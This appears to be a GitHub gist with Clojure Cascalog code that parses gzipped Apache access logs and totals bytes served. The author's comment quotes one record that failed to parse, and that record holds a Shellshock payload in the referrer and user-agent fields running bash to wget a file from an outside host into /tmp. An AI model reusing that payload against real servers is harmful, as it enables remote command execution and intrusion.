Skip to content

Instantly share code, notes, and snippets.

@jdevoo
Created March 21, 2015 16:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jdevoo/056586c4ba604882fdd3 to your computer and use it in GitHub Desktop.
Save jdevoo/056586c4ba604882fdd3 to your computer and use it in GitHub Desktop.
Apache Logs
(ns spatialog.core
(:use [cascalog api])
(:require [cascalog.cascading.tap :as tap]))
(defn parse-log-str [str]
(rest (re-find #"^(\S+) (\S+) (\S+) \[([\w:/]+\s[+\-]\d{4})\] \"(.+?)\" (\S+) (\S+) \"([^\"]*)\" \"([^\"]*)\"" str)))
(def apache-logs-tap
(let [src (tap/hfs-textline "resources/"
:compression :enable :source-pattern "Site?-access.log.gz")
log-fields ["?remote-addr" "?remote-logname" "?user" "?time"
"?request" "?status" "?bytes_string"
"?referrer" "?browser"]]
(<- log-fields
(src ?line)
(parse-log-str ?line :>> log-fields)
(:trap (tap/hfs-textline "resources/err"))
(:distinct false))))
;;;; from the REPL
;(?<- (stdout)
; [?total_bytes]
; (apache-logs-tap _ _ _ _ _ _ ?bytes_string _ _)
; (read-string ?bytes_string :> ?bytes_int)
; (c/sum ?bytes_int :> ?total_bytes))
; RESULTS
; -----------------------
; 9298259965
; -----------------------
@jdevoo
Copy link
Author

jdevoo commented Mar 23, 2015

same script run on my Windows 7 + Cygwin using Java 1.6 yields 23564569884 bytes and one trapped record
91.121.163.193 - - [02/Mar/2015:00:42:11 +0200] "GET / HTTP/1.0" 200 19952 "() { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3139342e3130322e3233312e38\"" "() { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3139342e3130322e3233312e38\""

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment